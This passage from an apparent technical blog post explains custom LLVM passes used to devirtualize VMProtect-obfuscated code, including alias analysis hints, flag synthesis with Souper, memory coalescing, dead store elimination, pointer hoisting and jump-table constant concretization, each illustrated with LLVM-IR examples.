define dso_local i64 @F_0x14000101f(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) #2 {
  %1 = load i64, i64* %rsp, align 8, !tbaa !4, !alias.scope !22, !noalias !27
  %2 = add i64 %1, -8
  %3 = load i64, i64* %rcx, align 8, !alias.scope !65, !noalias !66
  %4 = inttoptr i64 %2 to i64*
  store i64 1, i64* %4, align 1, !noalias !67
  %5 = inttoptr i64 %3 to i64*
  store i64 2, i64* %5, align 1, !noalias !67
  %6 = load i64, i64* %4, align 1, !noalias !67
  store i64 %6, i64* %rax, align 8, !tbaa !4, !alias.scope !68, !noalias !69
  ret i64 5368713278

The devirtualized code without the SegmentsAA pass added to the pipeline and therefore no assumptions fed to LLVM

Alias analysis is a complex topic, and experience thought me that most of the propagation issues happening while using LLVM to deobfuscate some code are related to the LLVM’s alias analysis passes being hinder by some pointer computation. Therefore, having the capability to feed LLVM with context-aware information could be the only way to handle certain types of obfuscation. Beware that other tools you are used to are most likely doing similar “safe” assumptions under the hood (e.g. concolic execution tools using the concrete pointer to answer the aliasing queries).

The takeaway from this section is that, if needed, you can define your own alias analysis callback pass to be integrated in the optimization pipeline in such a way that pre-existing passes can make use of the refined aliasing query results. This is similar to updating IDA’s stack variables with proper type definitions to improve the propagation results.


This pass falls under the category of the VMProtect specific optimization problems. In fact, whoever looked into VMProtect 3.0.9 knows that the following trick, reimplemented as high level C code for simplicity, is being internally used to select between two branches of a conditional jump.

uint64_t ConditionalBranchLogic(uint64_t RFLAGS) {
  // Extracting the ZF flag bit
  uint64_t ConditionBit = (RFLAGS & 0x40) >> 6;
  // Writing the jump destinations
  uint64_t Stack[2] = { 0 };
  Stack[0] = 5369966919;
  Stack[1] = 5369966790;
  // Selecting the correct jump destination
  return Stack[ConditionBit];

What is really happening at the low level is that the branch destinations are written to adjacent stack slots and then a conditional load, controlled by the previously computed flags, is going to select between one slot or the other to fetch the right jump destination.

LLVM doesn’t automatically see through the conditional load, but it is providing us with all the needed information to write such an optimization ourselves. In fact, the ValueTracking analysis exposes the computeKnownBits function that we can use to determine if the index used in a getelementptr instruction is bound to have just two values.

At this point we can generate two separated load instructions accessing the stack slots with the inferred indices and feed them to a select instruction controlled by the index itself. At the next store-to-load propagation, LLVM will happily identify the matching store and load instructions, propagating the constants representing the conditional branch destinations and generating a nice select instruction with second and third constant operands.

; Matched pattern
%i0 = add i64 %base, %index
%i1 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %i0
%i2 = bitcast i8* %i1 to i64*
%i3 = load i64, i64* %i2, align 1

; Exploded form
%51 = add i64 %base, 0
%52 = add i64 %base, 8
%53 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
%54 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %52
%55 = bitcast i8* %53 to i64*
%56 = bitcast i8* %54 to i64*
%57 = load i64, i64* %55, align 8
%58 = load i64, i64* %56, align 8
%59 = icmp eq i64 %index, 0
%60 = select i1 %59, i64 %57, i64 %58

; Simplified select instruction
%59 = icmp eq i64 %index, 0
%60 = select i1 %59, i64 5369966919, i64 5369966790

The snippet above shows the matched pattern, its exploded form suitable for the LLVM propagation and its final optimized shape. In this case the ValueTracking analysis provided the values 0 and 8 as the only feasible ones for the %index value.

A brief discussion about this pass can be found in this chain of messages in the LLVM mailing list.


This pass falls in between the categories of the VMProtect specific optimization problems and LLVM optimization limitations. In fact, this pass is based on the enumerative synthesis logic implemented by Souper, with some minor tweaks to make it more performant for our use-case.

This pass exists because I’m lazy and the fewer ad-hoc patterns I write, the happier I am. The patterns we are talking about are the ones generated by the flag manipulations that VMProtect does when computing the condition for a conditional branch. LLVM already does a good job with simplifying part of the patterns, but to obtain mint-like results we absolutely need to help it a bit.

There’s not much to say about this pass, it is basically invoking Souper’s enumerative synthesis with a selected set of components (Inst::CtPop, Inst::Eq, Inst::Ne, Inst::Ult, Inst::Slt, Inst::Ule, Inst::Sle, Inst::SAddO, Inst::UAddO, Inst::SSubO, Inst::USubO, Inst::SMulO, Inst::UMulO), requiring the synthesis of a single instruction, enabling the data-flow pruning option and bounding the LHS candidates to a maximum of 50. Additionally the pass is executing the synthesis only on the i1 conditions used by the select and br instructions.

This Godbolt page shows the devirtualized LLVM-IR output obtained appending the SynthesizeFlags pass to the pipeline and the resulting assembly with the properly recompiled conditional jumps. The original assembly code can be seen below. It’s a dummy sequence of instructions where the key piece is the comparison between the rax and rbx registers that drives the conditional branch jcc.

  cmp rax, rbx
  jcc label
  and rcx, rdx
  mov qword ptr ds:[rcx], 1
  jmp exit
  xor rcx, rdx
  add qword ptr ds:[rcx], 2


This pass falls under the category of the generic LLVM optimization passes that couldn’t possibly be included in the mainline framework because they wouldn’t match the quality criteria of a stable pass. Although the transformations done by this pass are applicable to generic LLVM-IR code, even if the handled cases are most likely to be found in obfuscated code.

Passes like DSE already attempt to handle the case where a store instruction is partially or completely overlapping with other store instructions. Although the more convoluted case of multiple stores contributing to the value of a single memory slot are somehow only partially handled.

This pass is focusing on the handling of the case illustrated in the following snippet, where multiple smaller stores contribute to the creation of a bigger value subsequently accessed by a single load instruction.

define dso_local i64 @WhatDidYouDoToMySonYouEvilMonster(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  %1 = load i64, i64* %rsp, align 8
  %2 = add i64 %1, -8
  %3 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %2
  %4 = add i64 %1, -16
  %5 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %4
  %6 = load i64, i64* %rax, align 8
  %7 = add i64 %1, -10
  %8 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %7
  %9 = bitcast i8* %8 to i64*
  store i64 %6, i64* %9, align 1
  %10 = bitcast i8* %8 to i32*
  %11 = trunc i64 %6 to i32
  %12 = add i64 %1, -6
  %13 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %12
  %14 = bitcast i8* %13 to i32*
  store i32 %11, i32* %14, align 1
  %15 = bitcast i8* %13 to i16*
  %16 = trunc i64 %6 to i16
  %17 = add i64 %1, -4
  %18 = add i64 %1, -12
  %19 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %18
  %20 = bitcast i8* %19 to i64*
  %21 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %17
  %22 = bitcast i8* %21 to i16*
  %23 = load i16, i16* %22, align 1
  store i16 %23, i16* %15, align 1
  %24 = load i32, i32* %14, align 1
  %25 = shl i32 %24, 8
  %26 = bitcast i8* %21 to i32*
  store i32 %25, i32* %26, align 1
  %27 = bitcast i8* %3 to i16*
  store i16 %16, i16* %27, align 1
  %28 = bitcast i8* %8 to i16*
  store i16 %16, i16* %28, align 1
  %29 = load i32, i32* %10, align 1
  %30 = shl i32 %29, 8
  %31 = bitcast i8* %3 to i32*
  store i32 %30, i32* %31, align 1
  %32 = add i64 %1, -14
  %33 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %32
  %34 = add i64 %1, -2
  %35 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %34
  %36 = bitcast i8* %35 to i16*
  %37 = load i16, i16* %36, align 1
  store i16 %37, i16* %27, align 1
  %38 = add i64 %1, -18
  %39 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %38
  %40 = bitcast i8* %39 to i64*
  store i64 %6, i64* %40, align 1
  %41 = bitcast i8* %39 to i32*
  %42 = bitcast i8* %33 to i16*
  %43 = load i16, i16* %42, align 1
  %44 = bitcast i8* %19 to i16*
  %45 = load i16, i16* %44, align 1
  store i16 %45, i16* %42, align 1
  %46 = bitcast i8* %33 to i32*
  %47 = load i32, i32* %46, align 1
  %48 = shl i32 %47, 8
  %49 = bitcast i8* %19 to i32*
  store i32 %48, i32* %49, align 1
  %50 = bitcast i8* %5 to i16*
  store i16 %43, i16* %50, align 1
  %51 = bitcast i8* %39 to i16*
  store i16 %43, i16* %51, align 1
  %52 = load i32, i32* %41, align 1
  %53 = shl i32 %52, 8
  %54 = bitcast i8* %5 to i32*
  store i32 %53, i32* %54, align 1
  %55 = load i16, i16* %28, align 1
  store i16 %55, i16* %50, align 1
  %56 = load i32, i32* %54, align 1
  store i32 %56, i32* %49, align 1
  %57 = load i64, i64* %20, align 1
  store i64 %57, i64* %rax, align 8
  ret i64 5368713262

Now, you can arm yourself with patience and manually match all the store and load operations, or you can trust me when I tell you that all of them are concurring to the creation of a single i64 value that will be finally saved in the rax register.

The pass is working at the intra-block level and it’s relying on the analysis results provided by the MemorySSA, ScalarEvolution and AAResults interfaces to backward walk the definition chains concurring to the creation of the value fetched by each load instruction in the block. Doing that, it is filling a structure which keeps track of the aliasing store instructions, the stored values, and the offsets and sizes overlapping with the memory slot fetched by each load. If a sequence of store assignments completely defining the value of the whole memory slot is found, the chain is processed to remove the store-to-load indirection. Subsequent passes may then rely on this new indirection-free chain to apply more transformations. As an example the previous LLVM-IR snippet turns in the following optimized LLVM-IR snippet when the MemoryCoalescing pass is applied before executing the InstCombine pass. Nice huh?

define dso_local i64 @ThanksToLLVMMySonBswap64IsBack(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  %1 = load i64, i64* %rax, align 8
  %2 = call i64 @llvm.bswap.i64(i64 %1)
  store i64 %2, i64* %rax, align 8
  ret i64 5368713262


This pass also falls under the category of the generic LLVM optimization passes that couldn’t possibly be included in the mainline framework because they wouldn’t match the quality criteria of a stable pass. Although the transformations done by this pass are applicable to generic LLVM-IR code, even if the handled cases are most likely to be found in obfuscated code.

Conceptually similar to the MemoryCoalescing pass, the goal of this pass is to sweep a function to identify chains of store instructions that post-dominate a single store instruction and kill its value before it is actually being fetched. Passes like DSE are doing a similar job, although limited to some forms of full overlapping caused by multiple stores on a single post-dominated store.

Applying the -O3 pipeline to the following example won’t remove the first 64 bits dead store at RAM[%0], even if the subsequent 64 bits stores at RAM[%0 - 4] and RAM[%0 + 4] fully overlap it, redefining its value.

define dso_local void @DSE(i64 %0) local_unnamed_addr #0 {
  %2 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %0
  %3 = bitcast i8* %2 to i64*
  store i64 1234605616436508552, i64* %3, align 1
  %4 = add i64 %0, -4
  %5 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %4
  %6 = bitcast i8* %5 to i64*
  store i64 -6148858396813837381, i64* %6, align 1
  %7 = add i64 %0, 4
  %8 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %7
  %9 = bitcast i8* %8 to i64*
  store i64 -3689348814455574802, i64* %9, align 1
  ret void

Adding the PartialOverlapDSE pass to the pipeline will identify and kill the first store, enabling other passes to eventually kill the chain of computations contributing to the stored value. The built-in DSE pass is most likely not executing such a kill because collecting information about multiple overlapping stores is an expensive operation.


This pass is strictly related to the IsGuaranteedLoopInvariant patch I submitted, in fact it is just identifying all the pointers that could be safely hoisted to the entry block because depending solely on values coming directly from the entry block. Applying this kind of transformation prior to the execution of the DSE pass may lead to better optimization results.

As an example, consider this devirtualized function containing a rather useless switch case. I’m saying rather useless because each store in the case blocks is post-dominated and killed by the store i32 22, i32* %85 instruction, but LLVM is not going to kill those stores until we move the pointer computation to the entry block.

define dso_local i64 @F_0x1400045b0(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  %1 = load i64, i64* %rsp, align 8
  %2 = load i64, i64* %rcx, align 8
  %3 = call { i32, i32, i32, i32 } asm "  xchgq  %rbx,${1:q}\0A  cpuid\0A  xchgq  %rbx,${1:q}", "={ax},=r,={cx},={dx},0,~{dirflag},~{fpsr},~{flags}"(i32 1)
  %4 = extractvalue { i32, i32, i32, i32 } %3, 0
  %5 = extractvalue { i32, i32, i32, i32 } %3, 1
  %6 = and i32 %4, 4080
  %7 = icmp eq i32 %6, 4064
  %8 = xor i32 %4, 32
  %9 = select i1 %7, i32 %8, i32 %4
  %10 = and i32 %5, 16777215
  %11 = add i32 %9, %10
  %12 = load i64, i64* bitcast (i8* getelementptr inbounds ([0 x i8], [0 x i8]* @GS, i64 0, i64 96) to i64*), align 1
  %13 = add i64 %12, 288
  %14 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %13
  %15 = bitcast i8* %14 to i16*
  %16 = load i16, i16* %15, align 1
  %17 = zext i16 %16 to i32
  %18 = load i64, i64* bitcast (i8* getelementptr inbounds ([0 x i8], [0 x i8]* @RAM, i64 0, i64 5369231568) to i64*), align 1
  %19 = shl nuw nsw i32 %17, 7
  %20 = add i64 %18, 32
  %21 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %20
  %22 = bitcast i8* %21 to i32*
  %23 = load i32, i32* %22, align 1
  %24 = xor i32 %23, 2480
  %25 = add i32 %11, %19
  %26 = trunc i64 %18 to i32
  %27 = add i64 %18, 88
  %28 = xor i32 %25, %26
  br label %29

29:                                               ; preds = %37, %0
  %30 = phi i64 [ %27, %0 ], [ %38, %37 ]
  %31 = phi i32 [ %24, %0 ], [ %39, %37 ]
  %32 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %30
  %33 = bitcast i8* %32 to i32*
  %34 = load i32, i32* %33, align 1
  %35 = xor i32 %34, 30826
  %36 = icmp eq i32 %28, %35
  br i1 %36, label %41, label %37

37:                                               ; preds = %29
  %38 = add i64 %30, 8
  %39 = add i32 %31, -1
  %40 = icmp eq i32 %31, 1
  br i1 %40, label %86, label %29

41:                                               ; preds = %29
  %42 = add i64 %1, 40
  %43 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %42
  %44 = bitcast i8* %43 to i32*
  %45 = load i32, i32* %44, align 1
  %46 = add i64 %1, 36
  %47 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %46
  %48 = bitcast i8* %47 to i32*
  store i32 %45, i32* %48, align 1
  %49 = icmp ugt i32 %45, 5
  %50 = zext i32 %45 to i64
  %51 = add i64 %1, 32
  br i1 %49, label %81, label %52

52:                                               ; preds = %41
  %53 = shl nuw nsw i64 %50, 1
  %54 = and i64 %53, 4294967296
  %55 = sub nsw i64 %50, %54
  %56 = shl nsw i64 %55, 2
  %57 = add nsw i64 %56, 5368964976
  %58 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %57
  %59 = bitcast i8* %58 to i32*
  %60 = load i32, i32* %59, align 1
  %61 = zext i32 %60 to i64
  %62 = add nuw nsw i64 %61, 5368709120
  switch i32 %60, label %66 [
    i32 1465288, label %63
    i32 1510355, label %78
    i32 1706770, label %75
    i32 2442748, label %72
    i32 2740242, label %69

63:                                               ; preds = %52
  %64 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %65 = bitcast i8* %64 to i32*
  store i32 9, i32* %65, align 1
  br label %66

66:                                               ; preds = %52, %63
  %67 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %68 = bitcast i8* %67 to i32*
  store i32 20, i32* %68, align 1
  br label %69

69:                                               ; preds = %52, %66
  %70 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %71 = bitcast i8* %70 to i32*
  store i32 30, i32* %71, align 1
  br label %72

72:                                               ; preds = %52, %69
  %73 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %74 = bitcast i8* %73 to i32*
  store i32 55, i32* %74, align 1
  br label %75

75:                                               ; preds = %52, %72
  %76 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %77 = bitcast i8* %76 to i32*
  store i32 99, i32* %77, align 1
  br label %78

78:                                               ; preds = %52, %75
  %79 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %80 = bitcast i8* %79 to i32*
  store i32 100, i32* %80, align 1
  br label %81

81:                                               ; preds = %41, %78
  %82 = phi i64 [ %62, %78 ], [ %50, %41 ]
  %83 = phi i64 [ 5368709120, %78 ], [ %2, %41 ]
  %84 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %51
  %85 = bitcast i8* %84 to i32*
  store i32 22, i32* %85, align 1
  store i64 %83, i64* %rcx, align 8
  br label %86

86:                                               ; preds = %37, %81
  %87 = phi i64 [ %82, %81 ], [ 3735929054, %37 ]
  %88 = phi i64 [ 5368727067, %81 ], [ 0, %37 ]
  store i64 %87, i64* %rax, align 8
  ret i64 %88

When the PointersHoisting pass is applied before executing the DSE pass we obtain the following code, where the switch case has been completely removed because it has been deemed dead.

define dso_local i64 @F_0x1400045b0(i64* noalias nocapture nonnull align 8 dereferenceable(8) %0, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %1, i64* noalias nocapture nonnull align 8 dereferenceable(8) %2, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %3, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %4, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %5, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %6, i64* noalias nocapture nonnull readonly align 8 dereferenceable(8) %7, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %8, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %9, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %10, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %11, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %12, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %13, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %14, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %15, i64* noalias nocapture nonnull readnone align 8 dereferenceable(8) %16, i64 %17, i64 %18, i64 %19) local_unnamed_addr {
  %21 = load i64, i64* %7, align 8
  %22 = load i64, i64* %2, align 8
  %23 = tail call { i32, i32, i32, i32 } asm "  xchgq  %rbx,${1:q}\0A  cpuid\0A  xchgq  %rbx,${1:q}", "={ax},=r,={cx},={dx},0,~{dirflag},~{fpsr},~{flags}"(i32 1)
  %24 = extractvalue { i32, i32, i32, i32 } %23, 0
  %25 = extractvalue { i32, i32, i32, i32 } %23, 1
  %26 = and i32 %24, 4080
  %27 = icmp eq i32 %26, 4064
  %28 = xor i32 %24, 32
  %29 = select i1 %27, i32 %28, i32 %24
  %30 = and i32 %25, 16777215
  %31 = add i32 %29, %30
  %32 = load i64, i64* bitcast (i8* getelementptr inbounds ([0 x i8], [0 x i8]* @GS, i64 0, i64 96) to i64*), align 1
  %33 = add i64 %32, 288
  %34 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %33
  %35 = bitcast i8* %34 to i16*
  %36 = load i16, i16* %35, align 1
  %37 = zext i16 %36 to i32
  %38 = load i64, i64* bitcast (i8* getelementptr inbounds ([0 x i8], [0 x i8]* @RAM, i64 0, i64 5369231568) to i64*), align 1
  %39 = shl nuw nsw i32 %37, 7
  %40 = add i64 %38, 32
  %41 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %40
  %42 = bitcast i8* %41 to i32*
  %43 = load i32, i32* %42, align 1
  %44 = xor i32 %43, 2480
  %45 = add i32 %31, %39
  %46 = trunc i64 %38 to i32
  %47 = add i64 %38, 88
  %48 = xor i32 %45, %46
  %49 = add i64 %21, 32
  %50 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %49
  br label %51

  %52 = phi i64 [ %47, %20 ], [ %60, %59 ]
  %53 = phi i32 [ %44, %20 ], [ %61, %59 ]
  %54 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %52
  %55 = bitcast i8* %54 to i32*
  %56 = load i32, i32* %55, align 1
  %57 = xor i32 %56, 30826
  %58 = icmp eq i32 %48, %57
  br i1 %58, label %63, label %59

  %60 = add i64 %52, 8
  %61 = add i32 %53, -1
  %62 = icmp eq i32 %53, 1
  br i1 %62, label %88, label %51

  %64 = add i64 %21, 40
  %65 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %64
  %66 = bitcast i8* %65 to i32*
  %67 = load i32, i32* %66, align 1
  %68 = add i64 %21, 36
  %69 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %68
  %70 = bitcast i8* %69 to i32*
  store i32 %67, i32* %70, align 1
  %71 = icmp ugt i32 %67, 5
  %72 = zext i32 %67 to i64
  br i1 %71, label %84, label %73

  %74 = shl nuw nsw i64 %72, 1
  %75 = and i64 %74, 4294967296
  %76 = sub nsw i64 %72, %75
  %77 = shl nsw i64 %76, 2
  %78 = add nsw i64 %77, 5368964976
  %79 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %78
  %80 = bitcast i8* %79 to i32*
  %81 = load i32, i32* %80, align 1
  %82 = zext i32 %81 to i64
  %83 = add nuw nsw i64 %82, 5368709120
  br label %84

  %85 = phi i64 [ %83, %73 ], [ %72, %63 ]
  %86 = phi i64 [ 5368709120, %73 ], [ %22, %63 ]
  %87 = bitcast i8* %50 to i32*
  store i32 22, i32* %87, align 1
  store i64 %86, i64* %2, align 8
  br label %88

  %89 = phi i64 [ %85, %84 ], [ 3735929054, %59 ]
  %90 = phi i64 [ 5368727067, %84 ], [ 0, %59 ]
  store i64 %89, i64* %0, align 8
  ret i64 %90


This pass falls under the category of the generic LLVM optimization passes that are useful when dealing with obfuscated code, but basically useless, at least in the current shape, in a standard compilation pipeline. In fact, it’s not uncommon to find obfuscated code relying on constants stored in data sections added during the protection phase.

As an example, on some versions of VMProtect, when the Ultra mode is used, the conditional branch computations involve dummy constants fetched from a data section. Or if we think about a virtualized jump table (e.g. generated by a switch in the original binary), we also have to deal with a set of constants fetched from a data section.

Hence the reason for having a custom pass that, during the execution of the pipeline, identifies potential constant data accesses and converts the associated memory load into an LLVM constant (or chain of constants). This process can be referred to as constant(s) concretization.

The pass is going to identify all the load memory accesses in the function and determine if they fall in the following categories:

  • A constantexpr memory load that is using an address contained in one of the binary sections; this case is what you would hit when dealing with some kind of data-based obfuscation;
  • A symbolic memory load that is using as base an address contained in one of the binary sections and as index an expression that is constrained to a limited amount of values; this case is what you would hit when dealing with a jump table.

In both cases the user needs to provide a safe set of memory ranges that the pass can consider as read-only, otherwise the pass will restrict the concretization to addresses falling in read-only sections in the binary.

In the first case, the address is directly available and the associated value can be resolved simply parsing the binary.

In the second case the expression computing the symbolic memory access is sliced, the constraint(s) coming from the predecessor block(s) are harvested and Souper is queried in an incremental way (conceptually similar to the one used while solving the outgoing edges in a VmBlock) to obtain the set of addresses accessing the binary. Each address is then verified to be really laying in a binary section and the corresponding value is fetched. At this point we have a unique mapping between each address and its value, that we can turn into a selection cascade, illustrated in the following LLVM-IR snippet:

; Fetching the switch control value from [rsp + 40]
%2 = add i64 %rsp, 40
%3 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %2
%4 = bitcast i8* %3 to i32*
%72 = load i32, i32* %4, align 1
; Computing the symbolic address
%84 = zext i32 %72 to i64
%85 = shl nuw nsw i64 %84, 1
%86 = and i64 %85, 4294967296
%87 = sub nsw i64 %84, %86
%88 = shl nsw i64 %87, 2
%89 = add nsw i64 %88, 5368964976
; Generated selection cascade
%90 = icmp eq i64 %89, 5368964988
%91 = icmp eq i64 %89, 5368964980
%92 = icmp eq i64 %89, 5368964984
%93 = icmp eq i64 %89, 5368964992
%94 = icmp eq i64 %89, 5368964996
%95 = select i1 %90, i64 2442748, i64 1465288
%96 = select i1 %91, i64 650651, i64 %95
%97 = select i1 %92, i64 2740242, i64 %96
%98 = select i1 %93, i64 1706770, i64 %97
%99 = select i1 %94, i64 1510355, i64 %98

The %99 value will hold the proper constant based on the address computed by the %89 value. The example above represents the lifted jump table shown in the next snippet, where you can notice the jump table base 0x14003E770 (5368964976) and the corresponding addresses and values:

.rdata:0x14003E770 dd 0x165BC8
.rdata:0x14003E774 dd 0x9ED9B
.rdata:0x14003E778 dd 0x29D012
.rdata:0x14003E77C dd 0x2545FC
.rdata:0x14003E780 dd 0x1A0B12
.rdata:0x14003E784 dd 0x170BD3

If we have a peek at the sliced jump condition implementing the virtualized switch case (below), this is how it looks after the ConstantConcretization pass has been scheduled in the pipeline and further InstCombine executions updated the selection cascade to compute the switch case addresses. Souper will therefore be able to identify the 6 possible outgoing edges, leading to the devirtualized switch case presented in the PointersHoisting section:

; Fetching the switch control value from [rsp + 40]
%2 = add i64 %rsp, 40
%3 = getelementptr inbounds [0 x i8], [0 x i8]* @RAM, i64 0, i64 %2
%4 = bitcast i8* %3 to i32*
%72 = load i32, i32* %4, align 1
; Computing the symbolic address
%84 = zext i32 %72 to i64
%85 = shl nuw nsw i64 %84, 1
%86 = and i64 %85, 4294967296
%87 = sub nsw i64 %84, %86
%88 = shl nsw i64 %87, 2
%89 = add nsw i64 %88, 5368964976
; Generated selection cascade
%90 = icmp eq i64 %89, 5368964988
%91 = icmp eq i64 %89, 5368964980
%92 = icmp eq i64 %89, 5368964984
%93 = icmp eq i64 %89, 5368964992
%94 = icmp eq i64 %89, 5368964996
%95 = select i1 %90, i64 5371151872, i64 5370415894
%96 = select i1 %91, i64 5369359775, i64 %95
%97 = select i1 %92, i64 5371449366, i64 %96
%98 = select i1 %93, i64 5370174412, i64 %97
%99 = select i1 %94, i64 5370219479, i64 %98
%100 = call i64 @HelperKeepPC(i64 %99) #15

Unsupported instructions

It is well known that all the virtualization-based protectors support only a subset of the targeted ISA. Thus, when an unsupported instruction is found, an exit from the virtual machine is executed (context switching to the host code), running the unsupported instruction(s) and re-entering the virtual machine (context switching back to the virtualized code).

